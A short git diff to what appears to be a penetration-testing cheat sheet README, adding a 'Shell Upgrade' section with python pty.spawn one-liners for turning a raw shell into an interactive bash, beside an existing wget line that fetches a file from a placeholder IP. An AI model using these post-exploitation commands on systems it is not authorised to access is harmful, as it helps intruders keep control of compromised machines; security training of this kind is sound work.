diff --git a/README.md b/README.md
index a2629ae..a068361 100644
--- a/README.md
+++ b/README.md
@@ -376,5 +376,20 @@ wget http://{IP ADDRESS}/{FILE} -outfile {FILE}
## Windows
+# Shell Upgrade
+
+## Python
+
+
+
+```bash
+# About: A command spawn a new shell using python
+# Download: MAy or may not be installed on server machine
+
+# Usage
+python3 -c 'import pty;pty.spawn("/bin/bash")'
+
+python -c 'import pty;pty.spawn("/bin/bash")'
+```